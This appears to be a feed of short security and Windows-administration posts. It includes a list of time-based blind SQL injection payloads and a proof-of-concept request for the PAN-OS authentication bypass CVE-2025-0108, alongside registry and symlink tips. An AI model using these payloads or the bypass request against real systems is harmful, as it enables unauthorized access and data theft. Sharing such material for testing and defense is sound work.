This 30-min workshop by the creator of Claude Code will teach you more about vibe-coding than 100 YouTube video guides.
Bookmark it & give it 30 minutes today. This video will change the way you use Claude forever.
In the latest release of JXScout Pro, I've added support for file system ingestion, allowing you to leverage JXScout's pipeline to analyze JS files from different sources like Chrome Extensions and wayback machine
Docs available here: https://t.co/mn5hXMGkGl
My favorite SQL injection payloads:
- 'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
- ')/**/OR/**/MID(0x352e362e33332d6c6f67,1,1)/**/LIKE/**/5/**/#
- 1-if(mid(version/*f*/(),1,1)=5,sleep/*f*/(5),0)'
I collected these from HackerOne reports.
CVE-2025-0108
PAN-OS: Authentication Bypass in the Management Web Interface
POC:
https://[IP]/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css
Detailed writeup:
https://t.co/640gvyS7qj
Configure added LSA protection for Windows 8.1 or later, or Windows Server 2012 R2 or later.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
To configure the feature with a UEFI variable:
"RunAsPPL"=dword:1
To configure the feature without a UEFI variable, only enforced on Windows 11 build 22H2 and higher:
"RunAsPPL"=dword:2
https://t.co/Ibvs36YCeN
In Windows, if you map a drive with an elevated prompt (e.g. Administrator), you won't be able to see it with your normal user account. This is expected behavior because of UAC.
There are some workarounds for this, I've tested the registry entry EnableLinkedConnections on Windows Server 2016 and it worked fine for me.
Some folks mentioned that the registry trick does not work for certain Windows 10 releases.
https://t.co/N80JUaXFNZ
In Windows, remote to local (R2L) and remote to remote (R2R) symbolic links are disabled by default.
When accessing a symbolic link on a file server, you may encounter this error message:
"The symbolic link cannot be followed because its type is disabled."
To fix it, use the following commands to enable R2L or R2R symbolic links:
fsutil behavior set SymlinkEvaluation R2L:1
fsutil behavior set SymlinkEvaluation R2R:1
CVE-2025-21298 is a no-click, high-risk vulnerability in Windows. Malicious RTF files can execute code remotely just by being previewed in Outlook.
Get the full details and mitigation steps: https://t.co/3HQncnbEiP
Junction point vs Symbolic link in Windows.
- Junction Points: These are similar to symbolic links but specifically used for directories. Junction points can link to local directories only.
mklink /J C:\link\folder E:\
- Symbolic Links: These can point to directories or files and can link to both local and remote resources.
mklink /D C:\link\folder E:\
- Identify the Link Type
dir /a
Get-ChildItem -Path C:\link\folder -Force | Select-Object LinkType, Target